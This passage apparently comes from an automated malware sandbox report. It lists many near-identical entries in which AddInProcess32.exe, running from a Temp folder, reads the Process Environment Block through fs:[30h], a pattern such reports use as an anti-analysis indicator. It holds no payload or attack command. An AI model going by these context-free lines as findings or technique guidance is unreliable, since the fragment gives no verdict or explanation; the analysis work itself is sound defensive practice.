          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01868350 mov ecx, dword ptr fs:[00000030h]3_2_01868350
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov ecx, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A352 mov eax, dword ptr fs:[00000030h]3_2_0188A352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E438F mov eax, dword ptr fs:[00000030h]3_2_017E438F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E438F mov eax, dword ptr fs:[00000030h]3_2_017E438F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186437C mov eax, dword ptr fs:[00000030h]3_2_0186437C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B826B mov eax, dword ptr fs:[00000030h]3_2_017B826B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov ecx, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6259 mov eax, dword ptr fs:[00000030h]3_2_017C6259
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA250 mov eax, dword ptr fs:[00000030h]3_2_017BA250
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B823B mov eax, dword ptr fs:[00000030h]3_2_017B823B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01848243 mov eax, dword ptr fs:[00000030h]3_2_01848243
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01848243 mov ecx, dword ptr fs:[00000030h]3_2_01848243
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187A250 mov eax, dword ptr fs:[00000030h]3_2_0187A250
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187A250 mov eax, dword ptr fs:[00000030h]3_2_0187A250
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D02A0 mov eax, dword ptr fs:[00000030h]3_2_017D02A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D02A0 mov eax, dword ptr fs:[00000030h]3_2_017D02A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE284 mov eax, dword ptr fs:[00000030h]3_2_017FE284
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE284 mov eax, dword ptr fs:[00000030h]3_2_017FE284
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8550 mov eax, dword ptr fs:[00000030h]3_2_017C8550
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8550 mov eax, dword ptr fs:[00000030h]3_2_017C8550
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856500 mov eax, dword ptr fs:[00000030h]3_2_01856500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC5ED mov eax, dword ptr fs:[00000030h]3_2_017FC5ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC5ED mov eax, dword ptr fs:[00000030h]3_2_017FC5ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C25E0 mov eax, dword ptr fs:[00000030h]3_2_017C25E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C65D0 mov eax, dword ptr fs:[00000030h]3_2_017C65D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA5D0 mov eax, dword ptr fs:[00000030h]3_2_017FA5D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA5D0 mov eax, dword ptr fs:[00000030h]3_2_017FA5D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE5CF mov eax, dword ptr fs:[00000030h]3_2_017FE5CF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE5CF mov eax, dword ptr fs:[00000030h]3_2_017FE5CF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E45B1 mov eax, dword ptr fs:[00000030h]3_2_017E45B1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E45B1 mov eax, dword ptr fs:[00000030h]3_2_017E45B1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE59C mov eax, dword ptr fs:[00000030h]3_2_017FE59C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F4588 mov eax, dword ptr fs:[00000030h]3_2_017F4588
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C2582 mov eax, dword ptr fs:[00000030h]3_2_017C2582
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C2582 mov ecx, dword ptr fs:[00000030h]3_2_017C2582
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187A49A mov eax, dword ptr fs:[00000030h]3_2_0187A49A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E245A mov eax, dword ptr fs:[00000030h]3_2_017E245A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B645D mov eax, dword ptr fs:[00000030h]3_2_017B645D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184A4B0 mov eax, dword ptr fs:[00000030h]3_2_0184A4B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA430 mov eax, dword ptr fs:[00000030h]3_2_017FA430
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BC427 mov eax, dword ptr fs:[00000030h]3_2_017BC427
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C04E5 mov ecx, dword ptr fs:[00000030h]3_2_017C04E5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F44B0 mov ecx, dword ptr fs:[00000030h]3_2_017F44B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187A456 mov eax, dword ptr fs:[00000030h]3_2_0187A456
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C64AB mov eax, dword ptr fs:[00000030h]3_2_017C64AB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C460 mov ecx, dword ptr fs:[00000030h]3_2_0184C460
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186678E mov eax, dword ptr fs:[00000030h]3_2_0186678E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8770 mov eax, dword ptr fs:[00000030h]3_2_017C8770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018747A0 mov eax, dword ptr fs:[00000030h]3_2_018747A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0750 mov eax, dword ptr fs:[00000030h]3_2_017C0750
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F674D mov esi, dword ptr fs:[00000030h]3_2_017F674D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F273C mov ecx, dword ptr fs:[00000030h]3_2_017F273C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018407C3 mov eax, dword ptr fs:[00000030h]3_2_018407C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E7E1 mov eax, dword ptr fs:[00000030h]3_2_0184E7E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0710 mov eax, dword ptr fs:[00000030h]3_2_017C0710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F0710 mov eax, dword ptr fs:[00000030h]3_2_017F0710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC700 mov eax, dword ptr fs:[00000030h]3_2_017FC700
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183C730 mov eax, dword ptr fs:[00000030h]3_2_0183C730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CC7C0 mov eax, dword ptr fs:[00000030h]3_2_017CC7C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01844755 mov eax, dword ptr fs:[00000030h]3_2_01844755
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C07AF mov eax, dword ptr fs:[00000030h]3_2_017C07AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E75D mov eax, dword ptr fs:[00000030h]3_2_0184E75D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F2674 mov eax, dword ptr fs:[00000030h]3_2_017F2674
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DC640 mov eax, dword ptr fs:[00000030h]3_2_017DC640
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C262C mov eax, dword ptr fs:[00000030h]3_2_017C262C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE627 mov eax, dword ptr fs:[00000030h]3_2_017DE627
